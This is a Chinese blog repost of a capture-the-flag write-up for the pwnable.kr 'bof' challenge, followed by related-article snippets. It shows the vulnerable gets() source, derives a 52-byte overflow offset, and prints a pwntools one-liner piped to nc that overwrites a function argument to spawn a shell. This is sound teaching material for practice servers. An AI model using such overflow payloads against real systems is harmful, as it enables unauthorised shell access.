bof

最新推荐文章于 2021-03-02 22:54:36 发布
最新推荐文章于 2021-03-02 22:54:36 发布
阅读量135 收藏
点赞数
文章标签: shell python
原文链接:http://www.cnblogs.com/zhibin123/p/10709846.html
版权

 题目给出了一个可执行文件和一个.c文件

打开.c可以看到源程序:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

需要让key==0xcafebabe,这里key是子函数的参数,被指定好,需要我们修改才可以成功。

函数调用时栈结构:

 

函数中有gets函数,可以由我们控制,输出长数据以至覆盖掉key,达到修改key目的。

问题变成需要多长数据?

用ida打开可执行文件,是32位的ida。

a1变量对应参数key,处于bp+0x8

s变量对应变量overflow数组,s处于bp-0x2c

二者之间差0x34,于是我们可以输入0x34的数据,然后到达key的地址,然后填入0xcafebabe

pwntools工具的p32()可以直接将数据0xcafebabe变为合适的数据

构造数据:

52*‘a’ + p32(0xcafebabe)

发送:

python -c "from pwn import *;print 52*'a' + p32(0xcafebabe)" | nc pwnable.kr 9000

然后一直一闪而过,貌似没成功,其实是sh弹出来然后一闪而过

加cat -,是为了防止shell一闪而过,保持与shell的连接。

显示的就是sh,直接输入命令即可

 

 

转载于:https://www.cnblogs.com/zhibin123/p/10709846.html

dibanfu3470
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BOF图像特征词典的原理以及实际测试
weixin_44037639的博客
05-12 1507
BOF算法原理 BOF介绍 BOF(Bag of features),即图像特征词典。 Bag of Feature 是一种图像特征提取方法,它借鉴了文本分类的思路(Bag of Words),从图像抽象出很多具有代表性的「关键词」,形成一个字典,再统计每张图片中出现的「关键词」数量,得到图片的特征向量。 「Bag of Feature」的本质是提出一种图像的特征表示方法。 根据「Bag of F...
pwnable.kr [bof]
shisuan1的博客
11-25 212
pwnable.kr [bof] Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running ...
pwnable.kr第三题:bof
10-03 206
0x000查看源码 打开bof.c文件 1 #include <stdio.h> 2 #include <string.h> 3 #include <stdlib.h> 4 void func(int key){ 5 char overflowme[32]; 6 printf("overflow ...
pwnable.kr】day3:bof
weixin_38312031的博客
12-12 261
pwnable:bof pwnable.kr:bof 题目链接 question Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwna...
Pwnable.kr bof [Writeup]
柷敔的博客
03-02 288
题源 https://pwnable.kr/play.php Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 题解 Pwnable的第三道题,很
bof.rar_BOF
09-21
【标题】"BOF.rar" 是一个以 MFC(Microsoft Foundation Classes)库为基础的示例程序,主要展示了如何在Windows应用程序中使用按钮控件。"BOF" 可能是 "Buffer Overflow" 或 "Button Of Fun" 的缩写,但在这个上下...
Java+opencv实现bof图像检索算法
05-22
【Java+OpenCV实现BOF图像检索算法】 在计算机视觉领域,图像检索是一个重要的任务,其目的是通过比较图像特征来找到相似的图像。本项目利用Java编程语言结合OpenCV库,实现了基于Bag of Visual Words(BOF)的图像...
BOF图像匹配-Python代码-计算机视觉
05-23
BOF图像匹配-Python代码-计算机视觉】 在计算机视觉领域,图像匹配是一个核心任务,它涉及识别和比较两张或多张图片中的相似或相同部分。Bag of Visual Words(BoF)模型是一种常用于图像表示和匹配的技术,尤其...
asp.net BOF或EOF有一个是真,或者当前记录已被删除
10-29
当尝试访问或修改数据库记录时,可能会遇到“BOF( Beginning Of File)或EOF(End Of File)有一个是真,或者当前记录已被删除”的错误。这个错误通常发生在试图操作一个空的记录集或者已经被删除的记录时。 BOF和...
python计算机视觉编程——基于BOF的图像检索(附代码) 计算机视觉.pdf
04-21
Python计算机视觉编程——基于BOF的图像检索(附代码) 计算机视觉是人工智能的一个重要分支,它的研究内容包括图像处理、图像分析、图像识别、图像检索等。图像检索是计算机视觉的一个重要应用领域,它的主要任务...
Bag of Features 之于图像检索
u010719432的专栏
04-14 1329
上一篇讲到图像检索中应用LSH实现快速搜索,其在一定概率的保证下解决了高维特征查询的问题,但笔者在应用LSH结合SIFT特征实践图像检索实验时,由于每张图像涉及上百个特征,那么在查询一张图片时,需要进行上而次的特征查询,即便是将查询图片的特征点数筛选至50%的量,一次图片查询需要进行的特征查询次数亦不容小窥。那么有没有方法可以将任意图片的所有特征向量用一个固定维数的向量表出,且这个维数并不因图片特
pwn 练习笔记 暑假的第一天
SsMing的博客
07-14 429
pwnable  bof 源码如下#include &lt;stdio.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void func(int key){    char overflowme[32];    printf("overflow me : ");    gets(overflowme);    // smash me!...
Bag of Features (BOF)图像检索算法
彼岸花
04-13 6520
Bag of features(Bof)一种是用于图像和视频检索的算法。此算法对于不同角度,光照的图像,基本都能在图像库中正确检索。 检索就要进行比对。两幅不同的图像如何比对,比对什么,这就需要提炼出每幅图像中精练的东西出来进行比较。正如超市中的条形码,就能很好的反映出一件商品的所有特征。因此概括的来说,bof就是生成每幅图像的“条形码”来进行检索。实验中,我们有一个包含100幅图像的小型图
pwnable之bof
qq_43430261的博客
10-18 347
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
pwnable.kr】bof
搓雪小怪兽的工作室
08-26 182
题目描述 Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnab...
writeup-bof
charlie_heng的专栏
11-21 492
Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.cRunning at : nc pwnable.kr
基于BoF(Bag-of-feature)图像分类
tostq的专栏
03-04 7500
图像分类一直是图像处理问题的热点,近年来基于BoF(bag-of-feature)特征袋方法倍受关注,特征袋方法(BoF)是词袋方法(BoW)一种改进。本文简要的介绍了基本BoF图像分类的思路和其目前的一些改进方法。 字典学习过程(train a codebook) (1)特征提取:利用SIFT等局部描述子(SIFT方法最为常用,OpponentSIFT在各类SIFT改进方式综合表现最
pwnable.kr-bof-Writeup
baikeng3674的博客
02-07 162
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include <stdio.h> 2 #include <string.h> 3 #include <stdlib.h> 4 void func(int k...
使用pandas BOF
最新发布
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值